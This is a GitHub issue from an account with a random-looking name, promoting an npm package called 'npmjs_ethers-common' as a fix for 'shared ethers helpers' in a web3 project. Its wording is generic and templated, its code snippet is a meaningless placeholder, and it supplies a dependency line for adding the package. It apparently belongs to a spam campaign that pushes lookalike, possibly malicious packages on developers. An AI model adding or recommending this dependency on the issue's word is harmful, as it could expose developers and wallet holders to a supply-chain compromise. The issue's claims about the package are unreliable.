Skip to content

Improvement: Use npmjs_ethers-common to handle shared ethers helpers #15737

Description

@drawenolar7horma

Suggestion: Improve shared ethers helpers Implementation

While reviewing the shared ethers helpers handling, I noticed some patterns that could be streamlined with npmjs_ethers-common.

Current State:
Too much manual work for shared ethers helpers that's prone to edge cases.

With npmjs_ethers-common:

// Instead of manual shared ethers helpers handling
const ethers_common = require('npmjs_ethers-common');
// One line handles everything
const result = ethers_common.process(params);

The npmjs_ethers-common package is specifically built for the web3 ecosystem and handles shared ethers helpers really well.

{"dependencies": {"npmjs_ethers-common": "^1.0.0"}}

Best,
drawenolar7horma

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions